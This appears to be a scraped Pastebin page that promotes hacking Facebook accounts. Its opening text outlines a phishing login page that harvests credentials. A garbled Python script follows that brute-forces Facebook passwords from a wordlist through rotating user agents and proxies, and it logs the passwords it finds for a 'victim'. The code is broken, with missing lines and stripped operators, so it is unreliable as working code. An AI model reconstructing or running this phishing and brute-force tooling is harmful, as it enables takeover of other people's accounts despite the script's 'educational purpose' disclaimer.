Jul 6th, 2015
Hacker Script Hack Fb
Never
As you all know facebook is the most famous social networking site in the world. This position has encouraged hackers to always try to find security flaws in Facebook's system. Thanks to these flaws, hackers are able to hack any Facebook account. You can easily hack facebook accounts too by using our web-based hacking application.
Script Hack Fb Cmd
- Facebook Hacking Html Code Pdf. Get the pdf version of Facebook Hacking Html Code – Details of how, nowadays, users can have a Facebook account with no prior knowledge. Facebook Hacking Html Code Free Download. The below Phishing Code is only for Educational Purposes. Steps to Use this code. Go to Download Page.
- How to Hack Facebook Account/Password with Code 1. Make Login Page looks like Facebook Login Page. Before starting this step, first check what your targetted user like. Create Script to Store Facebook Login Credentials. Put the above file inside same directory with name login.php.
- How to hack a Facebook account, Step by step: If you want to hack a facebook account, the easiest way is, your one and only way to hack a facebook account for free online. Facebook hacking is a relatively difficult concept. Hacking a facebook account requires years and years of programming knowledge and knowledge to facebooks infrastructure.
Script Hack Fb Html
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
- #!/usr/bin/python
- # This was written for educational purpose and pentest only. Use it at your own risk.
- # Author will not be responsible for any damage !!
- # Version : 1.0
- # https://www.facebook.com/groups/anonymousddosers/
- importre
- importsys
- importwarnings
- try:
- exceptImportError:
- print'[*] Please install mechanize python module first'
- exceptKeyboardInterrupt:
- sys.exit(1)
- importcookielib
- print'[*] Please install cookielib python module first'
- exceptKeyboardInterrupt:
- sys.exit(1)
- warnings.filterwarnings(action='ignore', message='.*gzip transfer encoding is experimental!', category=UserWarning)
- # define variable
- __programmer__ ='mmmuhahaha_ <hehe.haha@gmail.com>'
- verbose =False
- usepassproxy =False
- file=open(log,'a')
- checkpoint ='checkpoint'
- fblogin ='https://login.facebook.com/login.php?login_attempt=1'
- useragent =['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
- 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
- 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
- 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
- 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
- 'Opera/8.00 (Windows NT 5.1; U; en)',
- 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
- 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
- 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
- facebook =''
- / _| | | | |
- | _/ _` |/ __/ _ '_ / _ / _ | |/ /
- |_| __,_|______|_.__/ ___/ ___/|_|_
- Version : %s'' % (__programmer__, __version__)
- Usage : %s [options]
- Option : -w, --wordlist <filename> | Wordlist used for bruteforcing
- -p, --proxy <host:port> | Set http proxy will be use
- -k, --usernameproxy <username> | Set username at proxy will be use
- -i, --passproxy <password> | Set password at proxy will be use
- -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
- '' % (sys.argv[0],sys.argv[0],sys.argv[0])
- Usage : %s [option]
- '' % sys.argv[0]
- def helpme():
- print option
- file.write(option)
- print facebook
- file.write(facebook)
- sys.exit(1)
- for arg insys.argv:
- if arg.lower()'-u'or arg.lower()'--user':
- username =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-w'or arg.lower()'--wordlist':
- wordlist =sys.argv[int(sys.argv[1:].index(arg))+2]
- log =sys.argv[int(sys.argv[1:].index(arg))+2]
- useproxy =True
- elif arg.lower()'-k'or arg.lower()'--userproxy':
- usw =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-i'or arg.lower()'--passproxy':
- usp =sys.argv[int(sys.argv[1:].index(arg))+2]
- elif arg.lower()'-v'or arg.lower()'--verbose':
- elif arg.lower()'-h'or arg.lower()'--help':
- eliflen(sys.argv)<=1:
- exceptIOError:
- exceptNameError:
- exceptIndexError:
- try:
- userEmail = word[0:pos]
- print('password: ' + word )
- file.write('[*] Trying ' + userEmail + '::' + word + 'n')
- rch =random.choice(useragent)
- # print('User Agent: ' + rch )
- # for form in br.forms():
- # print form
- # To show all control elements in the form
- # for control in br.form.controls:
- # print 'type=%s, name=%s value=%s' % (control.type, control.name, br[control.name])
- # To dump cookies data being sent and received
- # If email still auto-filled on login form, this script would not work as expected, so we need to release it
- NotMe ='notme_cuid'
- if(NotMe in link.url):
- response = br.follow_link(link)
- br.form['email']= userEmail
- br.submit()
- print response
- print'nn[*] Logging in success...'
- print'[*] Password : %sn' % (word)
- file.write('n[*] userEmail : %s' % (userEmail))
- # After successful login, force to Log Out (to clear the cookies & session - important!)
- if form.attrs['id']'logout_form':
- br.submit()
- print'nn[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed'
- print'[*] Password : %sn' % (word)
- file.write('n[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed')
- file.write('n[*] Password : %snn' % (word))
- # In checkpoint, this account may has been logged in, so we need to Log it Out after successful login
- for link in br.links():
- request = br.click_link(link)
- # print response.geturl()
- # else:
- print'n[*] Exiting program...n'
- except mechanize._mechanize.FormNotFoundError:
- file.write('n[*] Form Not Foundn')
- except mechanize._form.ControlNotFoundError:
- file.write('n[*] Control Not Foundn')
- # def dump():
- # print cookie.name, cookie.value
- def releaser():
- for word in words:
- global br
- # Uncomment this variable if you want to enable dump()
- try:
- cj =cookielib.LWPCookieJar()
- br.set_handle_equiv(True)
- br.set_handle_redirect(True)
- br.set_handle_robots(False)
- br.set_debug_redirects(False)
- br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
- br.set_proxies({'http': proxy})
- br.add_proxy_password(usw, usp)
- br.set_debug_http(True)
- br.set_debug_redirects(True)
- print'n[*] Exiting program...n'
- sys.exit(1)
- preventstrokes =open(wordlist,'r')
- count =0
- words[count]= words[count].strip()
- exceptIOError:
- file.write('n[*] Error: Check your wordlist pathn')
- exceptNameError:
- exceptKeyboardInterrupt:
- file.write('n[*] Exiting program...n')
- try:
- print'n[*] Starting attack at %s' % time.strftime('%X')
- #print '[*] Account for bruteforcing %s' % (username)
- print'[*] Bruteforcing, please wait...'
- file.write('n[*] Starting attack at %s' % time.strftime('%X'))
- #file.write('n[*] Account for bruteforcing %s' % (username))
- file.write('n[*] Loaded : %d words' % int(len(words)))
- file.write('n[*] Bruteforcing, please wait...n')
- print'n[*] Exiting program...n'
- try:
- bruteforce(word)
- helpme()
- if __name__ '__main__':